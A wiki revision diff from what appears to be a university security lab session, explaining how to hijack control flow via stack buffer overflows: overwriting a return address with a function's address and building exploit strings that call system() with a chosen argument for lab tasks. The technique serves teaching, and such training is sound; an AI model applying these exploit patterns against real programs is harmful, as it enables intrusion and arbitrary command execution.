Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
sesiuni:memory:4 [2013/07/11 17:23]
acopot [Summary]
sesiuni:memory:4 [2013/07/12 15:21] (current)
rcaragea [Hijacking control flow]
Line 123: Line 123:
 </​code>​ </​code>​
  
-* Calling system(char *cmd) 
-     * Because system() takes one argument, you will have to do more than just overwrite the return address, you will need to append to your exploit pattern 4 bytes of '​JUNK'​ and 4 bytes that contain the address of char *cmd 
  
 + * When you want to jump to a function that takes no arguments you only need to append its address to the exploit pattern
 +      <code c>
 +      ...
 +      int f()
 +      {
 +          printf("​Hello\n"​);​
 +          return 42;
 +      }
 +      ...
 +      </​code>​
 + * If the address of the function is 0x0804849c your exploit pattern will look like "​AAAAAA...AAA\x9c\x84\x04\x08"​ because calling this function will look like
 +      <code asm>
 +      ...
 +      call   ​804849c <f>
 +      ...
 +      </​code>​
 +* For tasks randmin_03 and up you will need to call system(char *cmd)
 +      <code c>
 +      ...
 +      int f(char *str)
 +      {
 +          printf("​%s\n",​ str);
 +          return 42;
 +      }
 +      ...
 +      </​code>​
 +*  Translated to asm:
 +      <code asm>
 +      ...
 +      movl   ​$0x80485a0,​(%esp) ​     (0x80485a0 is the address of the string parameter)
 +      call   ​804849c <​f> ​           ​
 +      ...
 +      </​code>​
 +* Because '​call'​ also pushes 4 bytes on the stack the parameter is offset by exactly 4 bytes, so if you want to call f with the address of that string your exploit should look like "​AAAAAA...AAA\x9c\x84\x04\x08ABCD\xa0\x85\x04\x08"​ where ABCD is the 4 byte value mentioned (any value will work)
  
 == Tools you will need == == Tools you will need ==
Line 134: Line 166:
   * ulimit   * ulimit
   * checksec.sh [[http://​www.trapkit.de/​tools/​checksec.sh]]   * checksec.sh [[http://​www.trapkit.de/​tools/​checksec.sh]]
-  * aslr_brute_helper.py [[http://​swarm.cs.pub.ro/​~rcaragea/​aslr_brute_helper.py]]+  * <​del> ​aslr_brute_helper.py [[http://​swarm.cs.pub.ro/​~rcaragea/​aslr_brute_helper.py]] ​</​del>​
sesiuni/memory/4.1373552609.txt.gz · Last modified: 2013/07/11 17:23 by acopot